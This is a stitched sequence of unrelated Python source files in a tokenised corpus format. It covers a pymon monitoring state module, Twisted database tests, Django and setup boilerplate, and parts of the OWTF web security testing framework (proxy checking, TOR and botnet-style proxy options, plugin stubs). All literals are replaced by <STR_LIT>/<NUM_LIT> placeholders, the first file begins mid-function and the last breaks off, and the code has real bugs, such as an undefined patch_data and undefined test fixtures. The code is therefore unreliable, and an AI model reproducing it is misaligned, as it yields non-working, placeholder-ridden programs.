            return self.wrapped(*args, **kwargs)
        return wraps(func)(wrapper)


def get_metadata(error_code=<NUM_LIT:0>, error_message=None, status='<STR_LIT:OK>'):
    # Build a response-metadata dict; config-provided entries override the
    # defaults via update().
    metadata = {
        '<STR_LIT:status>': status,
        '<STR_LIT>': error_code,
    }
    if error_message is not None:
        metadata['<STR_LIT>'] = error_message
    metadata.update(get_config().get('<STR_LIT>', {}))
    return metadata


def Partial(func, **kwargs):
    """<STR_LIT>"""
    # Accepts either a callable or its dotted path.
    if isinstance(func, str):
        func = resolve_dotted_name(func)
    return partial(func, **kwargs)
<s> import re <EOL> import os <EOL> from Queue import Queue <EOL> try : <EOL> import cPickle as pickle <EOL> except ImportError : <EOL> import pickle <EOL> from zope . interface import implements <EOL> from twisted . persisted import sob <EOL> from twisted . persisted . sob import Persistent <EOL> from pymon import exceptions <EOL> from pymon import utils <EOL> from pymon . config import cfg <EOL> from pymon . interfaces import IState <EOL> from pymon . utils . logger import log <EOL> from pymon . utils . registry import Registry <EOL> from pymon . workflow . base import Workflow <EOL> from pymon . workflow . service import ServiceState , stateWorkflow <EOL> initialCheckData = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:count>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : - <NUM_LIT:1> , <EOL> '<STR_LIT>' : - <NUM_LIT:1> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:data>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> class InitialCheckData ( dict ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self ) : <EOL> self . update ( initialCheckData ) <EOL> class BaseState ( Persistent ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , data = { } ) : <EOL> Persistent . __init__ ( self , self , '<STR_LIT>' ) <EOL> self . data = data <EOL> self . filename = None <EOL> def __getstate__ ( self ) : <EOL> return self . __dict__ <EOL> def set ( self , key , value ) : <EOL> self . data [ key ] = value <EOL> self . 
__dict__ [ key ] = value <EOL> def get ( self , key ) : <EOL> return self . data [ key ] <EOL> def setFilename ( self , filename ) : <EOL> self . filename = filename <EOL> def getFilename ( self ) : <EOL> return self . filename <EOL> def save ( self , filename = None ) : <EOL> if not filename : <EOL> filename = self . filename <EOL> else : <EOL> self . filename = filename <EOL> def restore ( self ) : <EOL> if not self . filename : <EOL> raise exceptions . StateRestoreError , "<STR_LIT>" <EOL> if os . path . exists ( self . filename ) : <EOL> s = sob . load ( self . filename , '<STR_LIT>' ) <EOL> for key , val in s . __dict__ . items ( ) : <EOL> setattr ( self , key , val ) <EOL> def items ( self ) : <EOL> return self . data . items ( ) <EOL> class MonitorState ( BaseState ) : <EOL> '''<STR_LIT>''' <EOL> implements ( IState ) <EOL> def __init__ ( self , monitor ) : <EOL> self . monitor = monitor <EOL> BaseState . __init__ ( self , data = InitialCheckData ( ) ) <EOL> self . setFilename ( ) <EOL> self . workflow = ServiceState ( stateWorkflow ) <EOL> def setFilename ( self , filename = None ) : <EOL> backupDir = self . monitor . cfg . app . admin . backups . state_dir <EOL> if not filename : <EOL> filename = self . monitor . uid <EOL> self . filename = os . path . join ( backupDir , <EOL> re . sub ( '<STR_LIT>' , '<STR_LIT:_>' , filename ) ) <EOL> self . data . filename = self . filename <EOL> log . debug ( "<STR_LIT>" % self . filename ) <EOL> def setNonChangingState ( state , stateNum , uid ) : <EOL> stateName = cfg . getStateNameFromNumber ( stateNum ) <EOL> type = utils . getFriendlyTypeFromURI ( uid ) <EOL> host = utils . getHostFromURI ( uid ) <EOL> org = cfg . getCheckConfigFromURI ( uid ) . org <EOL> state . set ( '<STR_LIT>' , stateNum ) <EOL> state . set ( '<STR_LIT>' , stateName ) <EOL> state . set ( '<STR_LIT>' + stateName , <NUM_LIT:1> ) <EOL> state . set ( '<STR_LIT>' , host ) <EOL> state . set ( '<STR_LIT>' , type ) <EOL> if org : <EOL> state . 
set ( '<STR_LIT>' , org ) <EOL> return state <EOL> class History ( Queue , object ) : <EOL> '''<STR_LIT>''' <EOL> def setattr ( self , aName , aValue ) : <EOL> self . __setattr__ ( aName , aValue ) <EOL> def getattr ( self , aName ) : <EOL> return self . __getattribute__ ( aName ) <EOL> def setLastRemoved ( self , aItem ) : <EOL> self . setattr ( '<STR_LIT>' , aItem ) <EOL> def getLastRemoved ( self ) : <EOL> return self . getattr ( '<STR_LIT>' ) <EOL> def add ( self , aItem ) : <EOL> try : <EOL> self . put_nowait ( aItem ) <EOL> except : <EOL> self . removeItem ( ) <EOL> self . add ( aItem ) <EOL> def removeItem ( self ) : <EOL> self . setLastRemoved ( self . get ( ) ) <EOL> globalRegistry = Registry ( ) <EOL> state = BaseState ( ) <EOL> history = History ( ) <EOL> factories = { } <EOL> app_state = os . path . join ( cfg . admin . backups . state_dir , <EOL> cfg . admin . backups . application_state ) <EOL> state . setFilename ( app_state ) <EOL> try : <EOL> state . restore ( ) <EOL> log . info ( "<STR_LIT>" ) <EOL> except IOError : <EOL> state . save ( ) <EOL> globalRegistry . add ( '<STR_LIT:state>' , state ) <EOL> globalRegistry . add ( '<STR_LIT>' , history ) <EOL> globalRegistry . add ( '<STR_LIT>' , factories ) <EOL> def _test ( ) : <EOL> import doctest , application <EOL> doctest . testmod ( application ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> _test ( ) </s>
"""Trial test cases for the pymon storage API."""
import os
from datetime import datetime
from twisted.trial.unittest import TestCase
from twisted.internet.defer import DeferredList
from pymon.storage import api


class DatabaseSetupTestCase(TestCase):
    """Smoke test for obtaining a database connection."""
    def setUp(self):
        """Create a scratch filename for the test database."""
        self.filename = self.mktemp()

    def test_connectionSchema(self):
        # Only asserts that getDatabase() does not raise.
        db = api.getDatabase("<STR_LIT>")


class DatabaseAPITestCase(TestCase):
    """<STR_LIT:U+0020>"""
    # NOTE(review): this class references Status, Event and self.store, none
    # of which are defined or imported in this module — presumably they come
    # from pymon.storage; confirm the missing imports/setup.
    def setUp(self):
        """Open a file-backed database and seed fixture values."""
        self.filename = self.mktemp()
        self.database = api.getDatabase("<STR_LIT>" + self.filename)
        self.host = u'<STR_LIT>'
        self.service = u'<STR_LIT>'
        self.events = [u'<STR_LIT>', u'<STR_LIT>', u'<STR_LIT>', u'<STR_LIT:error>']
        self.conn = self.database.connect()

    def createHostStatus(self):
        # Insert a Status row for the fixture host/service.
        stat = Status()
        stat.host = self.host
        stat.service = self.service
        stat.ok_count = <NUM_LIT:0>
        return self.store.add(stat)

    def createHostEvent(self, transition, datetime):
        # Insert an Event row; `datetime` parameter shadows the module import.
        event = Event()
        event.host = self.host
        event.service = self.service
        event.transition = transition
        event.datetime = datetime
        return self.store.add(event)

    def queryHostStatus(self, result, host=None):
        # Callback-style query; `result` is the previous Deferred result.
        if not host:
            host = self.host
        return self.store.find(Status, Status.host == host)

    def cbGetOneResult(self, results):
        return results.one()

    def cbGetAllResults(self, results):
        results.order_by(Event.datetime)
        return results.get_all()

    def tearDown(self):
        """Remove the scratch database file and stop the store."""
        os.remove(self.filename)
        return self.store.stop()

    def test_addStatus(self):
        """Round-trip: add a status row, read it back, compare fields."""
        def cbCheck(result):
            self.assertEquals(result.host, self.host)
            self.assertEquals(result.service, self.service)
            return result
        d = self.createHostStatus()
        d.addCallback(self.queryHostStatus)
        d.addCallback(self.cbGetOneResult)
        d.addCallback(cbCheck)
        return d

    def test_incrementCount(self):
        """Mutate a fetched row, commit, re-fetch, verify the increment."""
        def cbSetCount(stat):
            stat.ok_count += <NUM_LIT:1>
            return self.store.commit()

        def cbCheckIncrement(stat):
            self.assertEquals(stat.ok_count, <NUM_LIT:1>)
            return stat
        d = self.createHostStatus()
        d.addCallback(self.queryHostStatus)
        d.addCallback(self.cbGetOneResult)
        d.addCallback(cbSetCount)
        d.addCallback(self.queryHostStatus)
        d.addCallback(self.cbGetOneResult)
        d.addCallback(cbCheckIncrement)
        return d

    def test_addEvent(self):
        """Insert several events and verify they come back in insert order."""
        def cbQueryEvent(ign):
            d = self.store.find(Event)
            d.addCallback(self.cbGetAllResults)
            return d

        def cbCheckEvent(events):
            expected = self.events
            received = [x.transition for x in events]
            self.assertEqual(expected, received)

        def createEvents():
            dl = []
            for event in self.events:
                dl.append(self.createHostEvent(event, datetime.now()))
            return DeferredList(dl)
        d = createEvents()
        d.addCallback(cbQueryEvent)
        d.addCallback(cbCheckEvent)
        return d
<s> import os <EOL> import sys <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> os . environ . setdefault ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> from django . core . management import execute_from_command_line <EOL> execute_from_command_line ( sys . argv ) </s>
<s> import re <EOL> import os <EOL> import pyservice <EOL> from setuptools import setup <EOL> setup ( <EOL> name = "<STR_LIT>" , <EOL> version = pyservice . __version__ , <EOL> author = re . sub ( r'<STR_LIT>' , r'<STR_LIT>' , pyservice . __author__ ) , <EOL> author_email = re . sub ( r'<STR_LIT>' , r'<STR_LIT>' , pyservice . __author__ ) , <EOL> url = '<STR_LIT>' , <EOL> description = ( "<STR_LIT>" ) , <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) , <EOL> license = "<STR_LIT>" , <EOL> keywords = "<STR_LIT>" , <EOL> py_modules = [ '<STR_LIT>' ] , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> entry_points = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> import history . models <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( default = history . models . get_time ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( default = history . models . get_time ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:30> , db_index = True ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:100> ) ) , <EOL> ( '<STR_LIT>' , models . BigIntegerField ( default = <NUM_LIT:0> ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:30> , db_index = True ) ) , <EOL> ( '<STR_LIT:text>' , models . TextField ( ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> ) , <EOL> ] </s>
<s> '''<STR_LIT>''' <EOL> from framework . db import models <EOL> from framework . dependency_management . dependency_resolver import BaseComponent <EOL> from framework . dependency_management . interfaces import DBErrorInterface <EOL> from framework . lib . exceptions import InvalidErrorReference <EOL> class ErrorDB ( BaseComponent , DBErrorInterface ) : <EOL> COMPONENT_NAME = "<STR_LIT>" <EOL> def __init__ ( self ) : <EOL> self . register_in_service_locator ( ) <EOL> self . db = self . get_component ( "<STR_LIT>" ) <EOL> self . config = self . get_component ( "<STR_LIT>" ) <EOL> def Add ( self , Message , Trace ) : <EOL> error = models . Error ( <EOL> owtf_message = Message , <EOL> traceback = Trace ) <EOL> self . db . session . add ( error ) <EOL> self . db . session . commit ( ) <EOL> def Delete ( self , error_id ) : <EOL> error = self . db . session . query ( models . Error ) . get ( error_id ) <EOL> if error : <EOL> self . db . session . delete ( error ) <EOL> self . db . session . commit ( ) <EOL> else : <EOL> raise InvalidErrorReference ( <EOL> "<STR_LIT>" + str ( error_id ) ) <EOL> def GenerateQueryUsingSession ( self , criteria ) : <EOL> query = self . db . session . query ( models . Error ) <EOL> if criteria . get ( '<STR_LIT>' , None ) : <EOL> if isinstance ( criteria . get ( '<STR_LIT>' ) , list ) : <EOL> criteria [ '<STR_LIT>' ] = criteria [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> query = query . filter_by ( <EOL> reported = self . config . ConvertStrToBool ( <EOL> criteria [ '<STR_LIT>' ] ) ) <EOL> return ( query ) <EOL> def Update ( self , error_id , user_message ) : <EOL> error = self . db . session . query ( models . Error ) . get ( error_id ) <EOL> if not error : <EOL> raise InvalidErrorReference ( <EOL> "<STR_LIT>" + str ( error_id ) ) <EOL> error . user_message = patch_data [ "<STR_LIT>" ] <EOL> self . db . session . merge ( error ) <EOL> self . db . session . 
commit ( ) <EOL> def DeriveErrorDict ( self , error_obj ) : <EOL> tdict = dict ( error_obj . __dict__ ) <EOL> tdict . pop ( "<STR_LIT>" , None ) <EOL> return ( tdict ) <EOL> def DeriveErrorDicts ( self , error_obj_list ) : <EOL> results = [ ] <EOL> for error_obj in error_obj_list : <EOL> if error_obj : <EOL> results . append ( self . DeriveErrorDict ( error_obj ) ) <EOL> return results <EOL> def GetAll ( self , criteria = None ) : <EOL> if not criteria : <EOL> criteria = { } <EOL> query = self . GenerateQueryUsingSession ( criteria ) <EOL> results = query . all ( ) <EOL> return ( self . DeriveErrorDicts ( results ) ) <EOL> def Get ( self , error_id ) : <EOL> error = self . db . session . query ( models . Error ) . get ( error_id ) <EOL> if not error : <EOL> raise InvalidErrorReference ( <EOL> "<STR_LIT>" + str ( error_id ) ) <EOL> return ( self . DeriveErrorDict ( error ) ) </s>
<s> '''<STR_LIT>''' <EOL> import tornado . curl_httpclient <EOL> from tornado . httpclient import HTTPRequest <EOL> import os <EOL> from tornado . ioloop import IOLoop <EOL> from tornado import gen <EOL> from framework . dependency_management . dependency_resolver import BaseComponent <EOL> import logging <EOL> class Proxy_manager ( BaseComponent ) : <EOL> COMPONENT_NAME = "<STR_LIT>" <EOL> testing_url = "<STR_LIT>" <EOL> testing_url_patern = "<STR_LIT>" <EOL> def __init__ ( self ) : <EOL> self . register_in_service_locator ( ) <EOL> self . testing_url = "<STR_LIT>" <EOL> self . proxies = [ ] <EOL> self . number_of_proxies = <NUM_LIT:0> <EOL> self . proxy_pointer = <NUM_LIT:0> <EOL> self . number_of_responses = <NUM_LIT:0> <EOL> def load_proxy_list ( self , proxylist_path ) : <EOL> file_handle = open ( os . path . expanduser ( proxylist_path ) , "<STR_LIT:r>" ) <EOL> proxies = [ ] <EOL> file_buf = file_handle . read ( ) <EOL> lines = file_buf . split ( "<STR_LIT:\n>" ) <EOL> for line in lines : <EOL> if str ( line ) . strip ( ) != "<STR_LIT>" : <EOL> proxies . append ( line . split ( "<STR_LIT::>" ) ) <EOL> logging . info ( "<STR_LIT>" ) <EOL> return proxies <EOL> def get_next_available_proxy ( self ) : <EOL> if self . proxy_pointer == ( self . number_of_proxies - <NUM_LIT:1> ) : <EOL> self . proxy_pointer = <NUM_LIT:0> <EOL> else : <EOL> self . proxy_pointer = self . proxy_pointer + <NUM_LIT:1> <EOL> proxy = self . proxies [ self . proxy_pointer ] <EOL> return { "<STR_LIT>" : proxy , "<STR_LIT:index>" : self . proxy_pointer } <EOL> def remove_current_proxy ( self , index ) : <EOL> del self . proxies [ index ] <EOL> self . number_of_proxies -= <NUM_LIT:1> <EOL> class Proxy_Checker ( ) : <EOL> Proxies = [ ] <EOL> number_of_responses = <NUM_LIT:0> <EOL> working_proxies = <NUM_LIT:0> <EOL> @ staticmethod <EOL> def check_proxies ( q , proxies ) : <EOL> Proxy_Checker . number_of_responses = <NUM_LIT:0> <EOL> Proxy_Checker . 
number_of_unchecked_proxies = len ( proxies ) <EOL> for i in range ( <NUM_LIT:0> , Proxy_Checker . number_of_unchecked_proxies ) : <EOL> IOLoop . instance ( ) . add_callback ( Proxy_Checker . handle_proxy_status , proxies [ i ] , i ) <EOL> IOLoop . instance ( ) . start ( ) <EOL> q . put ( Proxy_Checker . Proxies ) <EOL> @ staticmethod <EOL> @ gen . engine <EOL> def handle_proxy_status ( proxy , i ) : <EOL> request = HTTPRequest ( url = Proxy_manager . testing_url , <EOL> proxy_host = proxy [ <NUM_LIT:0> ] , <EOL> proxy_port = int ( proxy [ <NUM_LIT:1> ] ) , <EOL> validate_cert = False <EOL> ) <EOL> http_client = tornado . curl_httpclient . CurlAsyncHTTPClient ( ) <EOL> response = yield gen . Task ( http_client . fetch , request ) <EOL> if response . code == <NUM_LIT:200> and response . body . find ( Proxy_manager . testing_url_patern ) != - <NUM_LIT:1> : <EOL> Proxy_Checker . Proxies . append ( proxy ) <EOL> Proxy_Checker . working_proxies += <NUM_LIT:1> <EOL> Proxy_Checker . number_of_responses += <NUM_LIT:1> <EOL> logging . info ( "<STR_LIT>" + str ( Proxy_Checker . number_of_responses ) + "<STR_LIT:/>" + str ( Proxy_Checker . number_of_unchecked_proxies ) + "<STR_LIT>" + str ( Proxy_Checker . working_proxies ) + "<STR_LIT>" ) <EOL> if Proxy_Checker . number_of_responses == Proxy_Checker . number_of_unchecked_proxies : <EOL> IOLoop . instance ( ) . stop ( ) <EOL> logging . info ( "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> class FrameworkException ( Exception ) : <EOL> def __init__ ( self , value ) : <EOL> self . parameter = value <EOL> def __str__ ( self ) : <EOL> return repr ( self . parameter ) <EOL> class FrameworkAbortException ( FrameworkException ) : <EOL> pass <EOL> class PluginAbortException ( FrameworkException ) : <EOL> pass <EOL> class UnreachableTargetException ( FrameworkException ) : <EOL> pass <EOL> class UnresolvableTargetException ( FrameworkException ) : <EOL> pass <EOL> class DBIntegrityException ( FrameworkException ) : <EOL> pass <EOL> class InvalidTargetReference ( FrameworkException ) : <EOL> pass <EOL> class InvalidSessionReference ( FrameworkException ) : <EOL> pass <EOL> class InvalidTransactionReference ( FrameworkException ) : <EOL> pass <EOL> class InvalidParameterType ( FrameworkException ) : <EOL> pass <EOL> class InvalidWorkerReference ( FrameworkException ) : <EOL> pass <EOL> class InvalidErrorReference ( FrameworkException ) : <EOL> pass <EOL> class InvalidWorkReference ( FrameworkException ) : <EOL> pass <EOL> class InvalidConfigurationReference ( FrameworkException ) : <EOL> pass <EOL> class InvalidUrlReference ( FrameworkException ) : <EOL> pass <EOL> class InvalidActionReference ( FrameworkException ) : <EOL> pass <EOL> class InvalidMessageReference ( FrameworkException ) : <EOL> pass <EOL> class InvalidMappingReference ( FrameworkException ) : <EOL> pass </s>
"""<STR_LIT>"""
from __future__ import print_function
import os
import sys
import logging
from framework.dependency_check import verify_dependencies
# Dependency check must run before the remaining framework imports.
verify_dependencies(os.path.dirname(os.path.abspath(sys.argv[<NUM_LIT:0>])) or '<STR_LIT:.>')
from framework.core import Core
from framework.dependency_management.component_initialiser import ComponentInitialiser, DatabaseNotRunningException
from framework.dependency_management.dependency_resolver import ServiceLocator
from framework import update
from framework.lib.cli_options import usage, parse_options, parse_update_options


def banner():
    # Print the ASCII-art startup banner.
    print("""<STR_LIT>""")


def get_plugins_from_arg(arg):
    # Split a comma-separated plugin list and resolve each plugin's group;
    # bail out via usage() if the plugins span more than one group.
    plugins = arg.split('<STR_LIT:U+002C>')
    plugin_groups = ServiceLocator.get_component(
        "<STR_LIT>").GetGroupsForPlugins(plugins)
    if len(plugin_groups) > <NUM_LIT:1>:
        usage(
            "<STR_LIT>" +
            str(plugin_groups) + "<STR_LIT:'>")
    return [plugins, plugin_groups]


def process_options(user_args):
    # Parse and normalise every CLI option into the dict consumed by Core.
    try:
        db_plugin = ServiceLocator.get_component("<STR_LIT>")
        valid_groups = db_plugin.GetAllGroups()
        valid_types = db_plugin.GetAllTypes() + ['<STR_LIT:all>', '<STR_LIT>']
        arg = parse_options(user_args, valid_groups, valid_types)
    except KeyboardInterrupt as e:
        # NOTE(review): "str" + exception raises TypeError on Python 3;
        # should be `+ str(e)` — confirm intended Python version.
        usage("<STR_LIT>" + e)
    profiles = {}
    plugin_group = arg.PluginGroup
    if arg.CustomProfile:
        # Profiles come as comma-separated "name:path" pairs.
        for profile in arg.CustomProfile.split('<STR_LIT:U+002C>'):
            chunks = profile.split('<STR_LIT::>')
            if len(chunks) != <NUM_LIT:2> or not os.path.exists(chunks[<NUM_LIT:1>]):
                usage("<STR_LIT>")
            else:
                profiles[chunks[<NUM_LIT:0>]] = chunks[<NUM_LIT:1>]
    if arg.OnlyPlugins:
        arg.OnlyPlugins, plugin_groups = get_plugins_from_arg(arg.OnlyPlugins)
        try:
            # The plugin list implies the group; override the CLI value.
            plugin_group = plugin_groups[<NUM_LIT:0>]
        except IndexError:
            usage("<STR_LIT>")
        logging.info(
            "<STR_LIT>" +
            plugin_group + "<STR_LIT>")
    if arg.ExceptPlugins:
        arg.ExceptPlugins, plugin_groups = get_plugins_from_arg(arg.ExceptPlugins)
    if arg.TOR_mode:
        # TOR mode format: either a single keyword or a 5-field spec.
        arg.TOR_mode = arg.TOR_mode.split("<STR_LIT::>")
        if (arg.TOR_mode[<NUM_LIT:0>] == "<STR_LIT>"):
            from framework.http.proxy.tor_manager import TOR_manager
            TOR_manager.msg_configure_tor()
            exit(<NUM_LIT:0>)
        if len(arg.TOR_mode) == <NUM_LIT:1>:
            if arg.TOR_mode[<NUM_LIT:0>] != "<STR_LIT>":
                usage("<STR_LIT>")
        elif len(arg.TOR_mode) != <NUM_LIT:5>:
            usage("<STR_LIT>")
        else:
            # Default IP/port when the placeholder keyword is used.
            if arg.TOR_mode[<NUM_LIT:0>] == '<STR_LIT>':
                outbound_proxy_ip = "<STR_LIT:127.0.0.1>"
            else:
                outbound_proxy_ip = arg.TOR_mode[<NUM_LIT:0>]
            if arg.TOR_mode[<NUM_LIT:1>] == '<STR_LIT>':
                outbound_proxy_port = "<STR_LIT>"
            else:
                outbound_proxy_port = arg.TOR_mode[<NUM_LIT:1>]
            # TOR acts as the outbound proxy from here on.
            arg.OutboundProxy = "<STR_LIT>" + outbound_proxy_ip + "<STR_LIT::>" + outbound_proxy_port
    if arg.Botnet_mode:
        arg.Botnet_mode = arg.Botnet_mode.split("<STR_LIT::>")
        if arg.Botnet_mode[<NUM_LIT:0>] == "<STR_LIT>" and len(arg.Botnet_mode) != <NUM_LIT:1>:
            usage("<STR_LIT>")
        if arg.Botnet_mode[<NUM_LIT:0>] == "<STR_LIT:list>":
            # "list" mode requires an existing proxy-list file path.
            if len(arg.Botnet_mode) != <NUM_LIT:2>:
                usage("<STR_LIT>")
            if not os.path.isfile(os.path.expanduser(arg.Botnet_mode[<NUM_LIT:1>])):
                usage("<STR_LIT>")
    if arg.OutboundProxy:
        # Accept "scheme://host:port" or bare "host:port".
        arg.OutboundProxy = arg.OutboundProxy.split('<STR_LIT>')
        if len(arg.OutboundProxy) == <NUM_LIT:2>:
            arg.OutboundProxy = arg.OutboundProxy + arg.OutboundProxy.pop().split('<STR_LIT::>')
            if arg.OutboundProxy[<NUM_LIT:0>] not in ["<STR_LIT>", "<STR_LIT:http>"]:
                usage("<STR_LIT>")
        else:
            arg.OutboundProxy = arg.OutboundProxy.pop().split('<STR_LIT::>')
        if (len(arg.OutboundProxy) not in [<NUM_LIT:2>, <NUM_LIT:3>]):
            usage("<STR_LIT>")
        else:
            try:
                # Last element must be a numeric port.
                int(arg.OutboundProxy[-<NUM_LIT:1>])
            except ValueError:
                usage("<STR_LIT>")
    if arg.InboundProxy:
        arg.InboundProxy = arg.InboundProxy.split('<STR_LIT::>')
        if len(arg.InboundProxy) not in [<NUM_LIT:1>, <NUM_LIT:2>]:
            usage("<STR_LIT>")
        else:
            try:
                int(arg.InboundProxy[-<NUM_LIT:1>])
            except ValueError:
                usage("<STR_LIT>")
    plugin_types_for_group = db_plugin.GetTypesForGroup(plugin_group)
    if arg.PluginType == '<STR_LIT:all>':
        arg.PluginType = plugin_types_for_group
    elif arg.PluginType == '<STR_LIT>':
        arg.PluginType = ['<STR_LIT>', '<STR_LIT>']
    scope = arg.Targets or []
    num_targets = len(scope)
    if plugin_group != '<STR_LIT>' and num_targets == <NUM_LIT:0> and not arg.list_plugins:
        pass
    elif num_targets == <NUM_LIT:1>:
        # A single target that is a file is treated as a target list.
        if os.path.isfile(scope[<NUM_LIT:0>]):
            logging.info("<STR_LIT>")
            new_scope = []
            for target in open(scope[<NUM_LIT:0>]).read().split("<STR_LIT:\n>"):
                CleanTarget = target.strip()
                if not CleanTarget:
                    continue
                new_scope.append(CleanTarget)
            if len(new_scope) == <NUM_LIT:0>:
                usage("<STR_LIT>")
            scope = new_scope
    for target in scope:
        # Leading '-' means a stray option leaked into the target list.
        if target[<NUM_LIT:0>] == "<STR_LIT:->":
            usage("<STR_LIT>" + target)
    args = '<STR_LIT>'
    if plugin_group == '<STR_LIT>':
        # Auxiliary group: targets are really plugin arguments.
        args = scope
        scope = ['<STR_LIT>']
    return {
        '<STR_LIT>': arg.list_plugins,
        '<STR_LIT>': arg.ForceOverwrite,
        '<STR_LIT>': arg.Interactive == '<STR_LIT:yes>',
        '<STR_LIT>': arg.Simulation,
        '<STR_LIT>': scope,
        '<STR_LIT>': sys.argv,
        '<STR_LIT>': arg.PluginType,
        '<STR_LIT>': arg.OnlyPlugins,
        '<STR_LIT>': arg.ExceptPlugins,
        '<STR_LIT>': arg.InboundProxy,
        '<STR_LIT>': arg.OutboundProxy,
        '<STR_LIT>': arg.OutboundProxyAuth,
        '<STR_LIT>': profiles,
        '<STR_LIT>': plugin_group,
        '<STR_LIT>': arg.RPort,
        '<STR_LIT>': arg.PortWaves,
        '<STR_LIT>': arg.ProxyMode,
        '<STR_LIT>': arg.TOR_mode,
        '<STR_LIT>': arg.Botnet_mode,
        '<STR_LIT>': arg.nowebui,
        '<STR_LIT>': args}


def run_owtf(core, args):
    # Drive the core lifecycle; temp storage is cleaned even on Ctrl-C.
    try:
        if core.start(args):
            core.finish()
    except KeyboardInterrupt:
        logging.warning("<STR_LIT>")
        logging.info("<STR_LIT>")
        core.finish()
    except SystemExit:
        pass
    finally:
        core.clean_temp_storage_dirs()


def main(args):
    # Entry point: normal scan mode, or self-update mode when the update
    # flag is present in argv.
    banner()
    root_dir = os.path.dirname(os.path.abspath(args[<NUM_LIT:0>])) or '<STR_LIT:.>'
    owtf_pid = os.getpid()
    if not "<STR_LIT>" in args[<NUM_LIT:1>:]:
        try:
            ComponentInitialiser.initialisation_phase_1(root_dir, owtf_pid)
        except DatabaseNotRunningException:
            exit(-<NUM_LIT:1>)
        args = process_options(args[<NUM_LIT:1>:])
        ComponentInitialiser.initialisation_phase_2(args)
        core = Core()
        logging.warn(
            "<STR_LIT>" % (
                ServiceLocator.get_component("<STR_LIT>").FrameworkConfigGet('<STR_LIT>'),
                ServiceLocator.get_component("<STR_LIT>").FrameworkConfigGet('<STR_LIT>'))
        )
        run_owtf(core, args)
    else:
        # Update mode: parse the reduced option set and run the updater.
        try:
            arg = parse_update_options(args[<NUM_LIT:1>:])
        except Exception as e:
            # NOTE(review): "str" + exception — same TypeError risk as above.
            usage("<STR_LIT>" + e)
        updater = update.Updater(root_dir)
        if arg.OutboundProxy:
            if arg.OutboundProxyAuth:
                updater.set_proxy(
                    arg.OutboundProxy,
                    proxy_auth=arg.OutboundProxyAuth)
            else:
                updater.set_proxy(arg.OutboundProxy)
        updater.update()


if __name__ == "<STR_LIT:__main__>":
    main(sys.argv)
<s> from framework . dependency_management . dependency_resolver import ServiceLocator <EOL> """<STR_LIT>""" <EOL> DESCRIPTION = "<STR_LIT>" <EOL> def run ( PluginInfo ) : <EOL> return ServiceLocator . get_component ( "<STR_LIT>" ) . CommandDump ( '<STR_LIT>' , '<STR_LIT>' , ServiceLocator . get_component ( "<STR_LIT>" ) . GetResources ( '<STR_LIT>' ) , PluginInfo , [ ] ) </s>
<s> from framework . dependency_management . dependency_resolver import ServiceLocator <EOL> """<STR_LIT>""" <EOL> import string , re <EOL> import cgi <EOL> DESCRIPTION = "<STR_LIT>" <EOL> def run ( PluginInfo ) : <EOL> plugin_helper = ServiceLocator . get_component ( "<STR_LIT>" ) <EOL> Content = plugin_helper . VulnerabilitySearchBox ( '<STR_LIT>' ) <EOL> Content += plugin_helper . ResourceLinkList ( '<STR_LIT>' , ServiceLocator . get_component ( "<STR_LIT>" ) . GetResources ( '<STR_LIT>' ) ) <EOL> return Content </s>
<s> from framework . dependency_management . dependency_resolver import ServiceLocator <EOL> """<STR_LIT>""" <EOL> DESCRIPTION = "<STR_LIT>" <EOL> def run ( PluginInfo ) : <EOL> return ServiceLocator . get_component ( "<STR_LIT>" ) . ResourceLinkList ( '<STR_LIT>' , ServiceLocator . get_component ( "<STR_LIT>" ) . GetResources ( '<STR_LIT>' ) ) </s>
from tests.testing_framework.base_test_cases import BaseTestCase
from hamcrest import *
from flexmock import flexmock
from framework.db.command_register import CommandRegister


class CommandRegisterTests(BaseTestCase):
    """Unit tests for CommandRegister using a flexmock'd core/DB."""

    def before(self):
